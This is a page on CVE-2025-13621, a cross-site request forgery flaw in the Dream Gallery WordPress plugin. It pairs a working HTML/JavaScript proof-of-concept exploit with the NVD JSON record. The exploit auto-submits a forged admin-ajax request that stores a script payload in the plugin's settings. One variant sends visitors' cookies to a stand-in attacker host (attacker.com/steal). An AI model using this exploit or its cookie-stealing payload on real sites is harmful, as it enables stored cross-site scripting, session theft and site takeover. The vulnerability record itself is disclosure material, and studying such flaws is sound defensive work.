CVE-2025-13621

<!-- CSRF PoC for CVE-2025-13621 - Dream Gallery Plugin --> <!-- This PoC demonstrates how an attacker can inject malicious JavaScript via CSRF --> <!DOCTYPE html> <html> <head> <title>Dream Gallery CSRF Exploit - CVE-2025-13621</title> </head> <body> <h1>Dream Gallery CSRF Exploit - CVE-2025-13621</h1> <p>This PoC exploits the missing nonce validation in Dream Gallery plugin.</p> <form action="http://target-site.com/wp-admin/admin-ajax.php" method="POST" id="exploitForm"> <input type="hidden" name="action" value="dreampluginsmain"> <!-- Modify these parameters to inject malicious content --> <input type="hidden" name="setting_name" value="gallery_title"> <input type="hidden" name="setting_value" value="<img src=x onerror='alert(document.cookie)'>'> <input type="hidden" name="dreamgallery_nonce" value="any_value"> </form> <script> // Auto-submit the form when page loads document.getElementById('exploitForm').submit(); </script> <p>If you see this text, the form has been submitted.</p> </body> </html> <!-- Alternative: JavaScript-based fetch PoC --> <script> fetch('http://target-site.com/wp-admin/admin-ajax.php', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: new URLSearchParams({ 'action': 'dreampluginsmain', 'setting_name': 'gallery_title', 'setting_value': '<script>fetch("https://attacker.com/steal?c="+encodeURIComponent(document.cookie))</script>', }) }); </script>

{"cve": {"id": "CVE-2025-13621", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:08.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The dream gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'dreampluginsmain' AJAX action. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/dreamgallery.php#L254", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/dreamgallery.php#L257", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dream-gallery/tags/1.0/templates/front.php#L38", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dream-gallery/trunk/dreamgallery.php#L254", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cdf6ba0-2866-4347-8518-bb1d2e40bab3?source=cve", "source": "[email protected]"}]}}